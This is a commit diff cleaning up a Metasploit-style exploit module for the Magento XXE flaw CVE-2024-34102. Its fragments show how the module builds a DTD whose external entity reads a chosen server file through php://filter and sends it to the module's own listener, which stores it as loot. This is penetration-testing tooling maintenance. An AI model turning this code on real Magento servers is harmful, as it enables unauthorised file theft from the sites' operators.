Cleaning dead code and addeding default case

Author: heyder

modules/exploits/multi/http/magento_xxe_cve_2024_34102.rb

@@ -37,7 +37,6 @@ def initialize(info = {})
         ],
         'DefaultTarget' => 0,
         'Notes' => {
-          'AKA' => ['CosmicSting'],
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
           'SideEffects' => [IOC_IN_LOGS]
@@ -96,9 +95,8 @@ def dtd_param_name
     @dtd_param_name ||= rand_text_alpha_lower(4..8)
   end
 
-  def make_xxe_dtd(filter_path = nil, file = nil)
-    file ||= datastore['FILE']
-    filter_path ||= "php://filter/convert.base64-encode/resource=#{file}"
+  def make_xxe_dtd
+    filter_path = "php://filter/convert.base64-encode/resource=#{datastore['FILE']}"
     ent_file = rand_text_alpha_lower(4..8)
     %(
       <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
@@ -172,14 +170,15 @@ def exploit
     })
     datastore['SSL'] = true if ssl_restore
     xxe_request
+    sleep(5)
   rescue Timeout::Error => e
     fail_with(Failure::TimeoutExpired, e.message)
   end
 
   def on_request_uri(cli, req)
     super
     data = ''
-    # vprint_status("Received request for #{req.uri}")
+    
     case req.uri
     when /(.*).dtd/
       vprint_status("Received request for DTD file from #{cli.peerhost}")
@@ -198,6 +197,8 @@ def on_request_uri(cli, req)
         p = store_loot(datastore['FILE'], loot_type, datastore['RHOST'], data, loot_desc)
         print_good("File saved in: #{p}")
       end
+    else
+      print_status("Unexpected request received: '#{req.method} #{req.uri}'")
     end
 
     send_response(cli, data)